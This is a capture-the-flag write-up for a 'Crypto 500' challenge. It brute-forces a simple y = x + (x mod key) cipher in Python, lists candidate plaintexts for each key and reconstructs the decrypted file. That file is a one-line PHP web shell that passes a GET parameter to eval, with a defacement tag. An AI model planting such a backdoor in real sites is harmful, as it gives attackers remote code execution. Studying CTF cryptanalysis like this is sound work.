code hacking, zen coding

HackYouToo CTF – Crypto 500 – AllahAkbar

aXs

We were able to intercept a suspicious file. This is an archive of correspondence between leading cryptographers of hostile organization.
According to the agents’ data, during the conversation one of the respondents accidentally uses a file that is added as trusted to all computers of the organization. Their antivirus software recognizes the files by their md5 hashes. We want our virus to spread easily within their network and we have quantum computers, as well as other useful technologies. You understand the rest.

Let us know the md5 hash of deciphered ‘bin’ file.

Intelligence data: allahakbar.zip

See: http://hackyou.ctf.su/tasks/allahakbar

We have a “bin” file which is encrypted using this organization’s new encryption algorithm, we need to decrypt the file and submit its md5 as flag. So we really need to get all the bytes right.

Ciphertext:

100 138 138 119 20 126 130 134 118 20 142 118 130 140 120 102 20 145 150 20 110 139 116 157 144 141 20 133 168 2O 166 129 138 135 92 20 120 126 152 135 150 64 126 159 116 137 80 72 108 142 138 168 96 78 130 105 126 119 106 117 128 139 134 190 100 123 100 101 78 186 82 118 94 94 144 130 134 150 138 136 64 132 178 64 130 152 152 130 208 134 164 102 174 20 94 94 140 164 138 138 64 160 130 152 138 166 168 146 156 130 66 66 66 66 66 66 66 66 66 20 126 124

Algorithm for encryption is explained here: http://pastebin.com/2diahT7L

function enc(plaintext){
        key = random() mod (length(plaintext) * 2);
 
        ct = [];
 
        {for c as all characters in pt}
                ct += ascii_code_of_char(c) + (ascii_code_of_char(c) mod key++);
       
        return ct;
}

Some remarks:
– The length of the document is known so key will be 0 >= key > len(document)*2
– The cipher function is y = x + (x mod a) which mean we have multiple solutions for x for a given y

Producing solution candidates:

import sys

cipher = [100,138,138,119,20,126,130,134,118,20,142,118,130,140,120,102,20,145,150,20,110,139,116,157,144,141,20,133,168,20,166,129,138,135,92,20,120,126,152,135,150,64,126,159,116,137,80,72,108,142,138,168,96,78,130,105,126,119,106,117,128,139,134,190,100,123,100,101,78,186,82,118,94,94,144,130,134,150,138,136,64,132,178,64,130,152,152,130,208,134,164,102,174,20,94,94,140,164,138,138,64,160,130,152,138,166,168,146,156,130,66,66,66,66,66,66,66,66,66,20,126,124]

for key in range(1, len(cipher) * 2):
    i = key
    has_solution = 1
    flag = ''
    for c in cipher:
        stop = 0
        solutions = []
        for x in range(1,256):
            b = x + (x % i)
            if c == b:
                solutions.append(x)
                stop = stop + 1
                flag = flag + chr(x)
        if stop == 0:
            has_solution = 0
            break
        if key == 34: # guessed from list of possible solutions
            for solution in solutions:
                sys.stdout.write(chr(solution) + '(' + hex(solution) + ') ')
            print ""
        i = i + 1
    if has_solution == 1:
        print "key=", key, "flag=", repr(flag)

Output:

key= 2 flag= "cd\x8a\x87\x89u\x10\x13~}\x81\x82mr\n\x83\x89oy\x80\x82ltf\n\x13\x8b\x87\x91\ncn\x7f^j\x8d|\x89\x8a\nn\x90\x9f\n\x93\xa3rx\x89x@R\nbuft\x88\x81u\x8a Uk\x93Qh\\(@$Ohz_y\x890K']yQ\\yY5SY_~ec\x83\xa02S_2TU'J\xa4)M;/T/HnACjKEmD B\x83\xad AlLLxA\x95\xc2CR\x803W\x86\n//FwREwE PAuLEzST\x8aIN\x85A!!!!!!!!!\n?|>"
key= 4 flag= "bd\x86\x87\x8aw\x0e\x12~}\x82\x85kq\n\x86\x8dhy\x81\x8airY\n\x14}\x82\x8d\n[g\x84an\x92\x80\x8er\nq\x94\xa4\n\x86\x97ui{{AT\ndxhv\x8b\x84w\x8d Vm\x96Rj](A$Pj|`{\x8b0L'^{R]{Z5TZ`\x80fd\x85\xa22T`2UV'K\xa6)N;/U/HoACkKEnD B\x84\xaf AmLLyA\x96\xc4CR\x813W\x87\n//FxRExE PAvLE{ST\x8bIN\x86A!!!!!!!!!\n?}>"
key= 6 flag= "_b\x84\x85\x89v\x0f\x14vw}\x84ls\n\x7f\x87nw\x80\x7fnx]\n\x82\x87\x93\n^k\x89dr\x97u\x84u\nt\x87\x98\n\x89\x9bxk~~BV\nQfjx\x8e\x87y\x90 Wo\x99Sl^(B$Ql~a}\x8d0M'_}S^}[5U[@agCe\xa42Ua2VW'L\xa8)O;/V/HpAClKEoD B\x85\xb1 AnLLzA\x97\xc6CR\x823W\x88\n//FyREyE PAwLE|ST\x8cIN\x87A!!!!!!!!!\n?~>"
key= 8 flag= "^b\x84\x81\x86m\n\x10sy\x80\x7fks\n}\x86ts}\x85hsa\n\x87\x7f\x8c\nSaqXg\x9cx\x88x\nw\x8a\x9c\n\x8c\x9f{m\x81\x81CX\nRhlz\x91[{\x93 Xq\x9cTn_(C$6R\x80b\x7f\x8f0N'`\x7fT?_\\5V\\@bhCf\xa62Vb2WX'M\xaa)P;/W/HqACmKEpD BY\x86 AoLL{A\x98\xc8CR\x833W\x89\n//FzREzE PAxLE}ST\x8dIN\x88A!!!!!!!!!\n?>"
key= 10 flag= "_d\x87\x81\x87v\n\x11{y\x81vhq\n\x83\x8demx\x8blxe\n\x8c\x83\x91\nUdtZj\x80{\x8c{\nz\x8d\xa0\n\x8f\xa3~o\x84\x84DZ\nSjn|\x94\\}\x96 Ys\x9fUp`(D$6S\x82c\x81\x910O'a\x81U?`]5W]@ciCg\xa82Wc2XY'N\xac)Q;/X/HrACnKEqD BY\x87 ApLL|A\x99\xcaCR\x843W\x8a\n//F{RE{E PAyLE~ST\x8eIN\x89A!!!!!!!!!\n?>"
key= 12 flag= "\\b\x86}\x84p\n\x12rw\x80|cm\n~\x89iq}xcpN\n\x91\x87\x96\nWgw\\m\x83~\x90~\n}\x90\xa4\n}\x92\x81q\x87\x87E\\\nTlp~\x97]e\x7f ZukVra(E$6T\x84d\x83\x930P'AbV?a^5X^@djCh\xaa2Xd2YZ'\xae)R;/Y/HsACoKErD BY\x88 AqLL}A\x9a\xccCR\x853W\x8b\n//F|RE|E PAzLE\x7fST\x8fIN\x8aA!!!!!!!!!\n?>"
key= 14 flag= "\\c\x81}\x85w\n\x13xs}\x82gr\nw\x83mu\x82|ftP\nw{\x8b\nYjz^p\x86n\x81\x81\n\x80\x93\xa8\n\x7f\x95Ws\x8a[.F\nUnrf\x80^f\x81 [wlWtb(F$6U\x86e\x85\x950Q'AcW?b_5Y_@ekCi\xac2Ye2Z['\xb0);/Z/HtACpKEsD BY\x89 ArLL~A\x9b\xceCR\x863W\x8c\n//F}RE}E PA{LE\x80ST\x90IN\x8bA!!!!!!!!!\n?>"
key= 16 flag= "Zb\x89{\x84k\n\x14~mxq_k\n{\x88qky\x80ixR\nz~\x8f\n[m}`s\x89p\x84\x84\n\x83\x80\x96\n\x81\x98X]u\\.G\nVptg\x82_g\x83 \\ym:Xc(G$6V\x88f\x87\x970R'AdX?c`5Z`@flCj\xae2Zf2[\'\xb2);/[/HuACqKEtD BY\x8a AsLL\x7fA\x9c\xd0CR\x873W\x8d\n//F~RE~E PA|LE\x81ST\x91IN\x8cA!!!!!!!!!\n?>"
key= 18 flag= "V_~w\x81p\nmq}ubo\n\x7f\x8dun}\x84\\lT\n}\x81\x93\nJ]\x80Nb\x8cr\x87\x87\nY\x82\x99\n\x83\x9bY^w].H\nWrvh\x84`h\x85 ]{n:Yd(H$6W\x8ag\x89\x990S'AeY?da5[a@gmCk\xb02[g2\\]'\xb4);/\\/HvACrKEuD BY\x8b AtLL\x80Ah\x9dCR\x883W\x8e\n//F\x7fRE\x7fE PA}LE\x82ST\x92IN\x8dA!!!!!!!!!\n?>"
key= 20 flag= "Zd\x84|\x87u\nqu\x82yes\nt\x83Zq\x81\x88^oV\n\x80q\x84\nK_\x83Od\x8ft\x8a\x8a\nZ\x84\x9c\n\x85\x9eZ_y^.I\nXtxi\x86ai\x87 ^}o:Ze(I$6X\x8cEh\x9b0T'AfZ?eb5\\b@hnCl\xb22\\h2]^'\xb6);/]/HwACsKEvD BY\x8c AuLL\x81Ah\x9eCR\x893W\x8f\n//F\x80RE\x80E PA~LE\x83ST\x93IN\x8eA!!!!!!!!!\n?>"
key= 22 flag= "S^\x8au\x81a\nuky}Yh\nw\x87\\ct\x8c`rX\n\x83s\x87\nLa\x86Pf\x92v\x8d\x8d\n[\x86\x9f\n\x87\xa1[`{_.J\nYvzj\x88bj\x89 ?_p:[f(J$6Y\x8eEi\x9d0U'Ag[?fc5]c@ioCm\xb42]i2^_'\xb8);/^/HxACtKEwD BY\x8d AvLL\x82Ah\x9fCR\x8a3W\x90\n//F\x81RE\x81E PA\x7fLE\x84ST\x94IN\x8fA!!!!!!!!!\n?>"
key= 24 flag= "Vbwy\x86d\nyn}\x81[k\nz\x8b^ewkbuZ\n\x86u\x8a\nMc\x89Qh\x95x\x90_\n\\\x88\xa2\n\x89\xa4\\a}`.K\nZx|k\x8ack\x8b ?`q:\\g(K$6ZGEj\x9f0V'Ah\\?gd5^d@jpCn\xb62^j2_`'\xba);//HyACuKExD BY\x8e AwLL\x83Ah\xa0CR\x8b3W\x91\n//F\x82RE\x82E PA\x80LE\x85ST\x95IN\x90A!!!!!!!!!\n?>"
key= 26 flag= "LY{o}g\n}q\x81\x85]n\nk}`gzmdx\\\n\x89w\x8d\nNe]Rj\x98az`\n]\x8a\xa5\no\x8b]b\x7fa.L\n<[~l\x8cdl\x8d ?ar:]h(L$6[GEk\xa10W'Ai]?he5_e@kqCo\xb82_k2`a']);//HzACvKEyD BY\x8f AxLL\x84Ah\xa1CR\x8c3W\x92\n//F\x83RE\x83E PA\x81LE\x86ST\x96IN\x91A!!!!!!!!!\n?>"
key= 28 flag= "N\\\x7fr\x81j\n`ctf_q\nm\x80bi}oQf^\n\x8cy\x90\nOg^Sl\x9bb|a\n^\x8c\xa8\np\x8d^c\x81b.M\n<\\?m\x8eem\x8f ?bs:^i(M$6\\GEl\xa30X'Aj^?if5`f@lrCp\xba2`l2ab']);//H{ACwKEzD BY\x90 AyLL\x85Ah\xa2CR\x8d3W\x93\n//F\x84RE\x84E PA\x82LE\x87ST\x97IN\x92A!!!!!!!!!\n?>"
key= 30 flag= "P_\x83u\x85m\nbewhat\no\x83dk\x80qRh`\n\x8f{\x93\nPi_Tnic~b\n_q\x8e\nq\x8f_d\x83c.N\n<]?n\x90fn\x91 ?ct:_j(N$6]GEm\xa50Y'Ak_?jg5ag@msCq\xbc2am2bc']);//H|ACxKE{D BY\x91 AzLL\x86Ah\xa3CR\x8e3W\x94\n//F\x85RE\x85E PALE\x88ST\x98IN\x93A!!!!!!!!!\n?>"
key= 32 flag= "Rb\x87x\x89p\ndgzjOc\nq\x86fWmsSjb\na}\x96\nQk`Upjd\x80c\n`r\x90\nr\x91`e\x85d.O\n<^?o\x92go\x93 ?du:`k(O$6^GEn\xa70Z'Al`?kh5bh@ntCr\xbe2bn2cd']);//H}ACyKE|D BY\x92 A{LL\x87Ah\xa4CR\x8f3W\x95\n//F\x86RE\x86E PALE\x89ST\x99IN\x94A!!!!!!!!!\n?>"
C(0x43) T(0x54)
h(0x68)
i(0x69) {(0x7b)
s(0x73)

(0xa)
f(0x66)
i(0x69) }(0x7d)
l(0x6c)
P(0x50) e(0x65)

(0xa)
s(0x73) ?(0x89)
h(0x68)
X(0x58) o(0x6f)
u(0x75)
T(0x54) l(0x6c)
d(0x64)

(0xa)
b(0x62)
e(0x65) (0x7f)

(0xa)
R(0x52) m(0x6d)
a(0x61)
V(0x56) r(0x72)
k(0x6b)
e(0x65) ?(0x82)
d(0x64)

(0xa)
a(0x61)
s(0x73) ?(0x92)

(0xa)
s(0x73) ?(0x93)
a(0x61)
f(0x66) ?(0x87)
e(0x65)
.(0x2e) P(0x50)

(0xa)
<(0x3c) _(0x5f)
?(0x3f)
p(0x70) ?(0x94)
h(0x68)
p(0x70) ?(0x95)
 (0x20)
?(0x3f) e(0x65)
v(0x76)
:(0x3a) a(0x61)
l(0x6c)
((0x28) P(0x50)
$(0x24)
6(0x36) _(0x5f)
G(0x47)
E(0x45) o(0x6f)
T(0x54)
0(0x30) [(0x5b)
'(0x27)
A(0x41) m(0x6d)
a(0x61)
?(0x3f) l(0x6c)
i(0x69)
5(0x35) c(0x63)
i(0x69)
@(0x40) o(0x6f)
u(0x75)
C(0x43) s(0x73)
_(0x5f)
2(0x32) c(0x63)
o(0x6f)
2(0x32) d(0x64)
e(0x65)
'(0x27)
](0x5d)
)(0x29)
;(0x3b)
/(0x2f)
/(0x2f)
H(0x48) ~(0x7e)
A(0x41)
C(0x43) z(0x7a)
K(0x4b)
E(0x45) }(0x7d)
D(0x44)
 (0x20)
B(0x42)
Y(0x59) ?(0x93)
 (0x20)
A(0x41) |(0x7c)
L(0x4c)
L(0x4c) ?(0x88)
A(0x41)
h(0x68) ?(0xa5)
C(0x43)
R(0x52) ?(0x90)
3(0x33)
W(0x57) ?(0x96)

(0xa)
/(0x2f)
/(0x2f)
F(0x46) ?(0x87)
R(0x52)
E(0x45) ?(0x87)
E(0x45)
 (0x20)
P(0x50)
A(0x41)
L(0x4c)
E(0x45) ?(0x8a)
S(0x53)
T(0x54) ?(0x9a)
I(0x49)
N(0x4e) ?(0x95)
A(0x41)
!(0x21)
!(0x21)
!(0x21)
!(0x21)
!(0x21)
!(0x21)
!(0x21)
!(0x21)
!(0x21)

(0xa)
?(0x3f)
>(0x3e)
key= 34 flag= "CThi{s\nfi}lPe\ns\x89hXouTld\nbe\x7f\nRmaVrke\x82d\nas\x92\ns\x93af\x87e.P\n<_?p\x94hp\x95 ?ev:al(P$6_GEoT0['Ama?li5ci@ouCs_2co2de']);//H~ACzKE}D BY\x93 A|LL\x88Ah\xa5CR\x903W\x96\n//F\x87RE\x87E PALE\x8aST\x9aIN\x95A!!!!!!!!!\n?>"

I hand-picked key=34 as the most promising solution because of the amount of readable text and then printed all the possible solutions for each ciphertext bytes.

Then I reconstructed the file using what seemed like the most probable value if there was several solutions.

Final decrypted file:

This
file
should
be
marked
as
safe.
<?php eval($_GET['malicious_code']);//HACKED BY ALLAhCR3W
//FREE PALESTINA!!!!!!!!!
?>

Curious to see if there is some way to find the good solution programmaticaly.

Share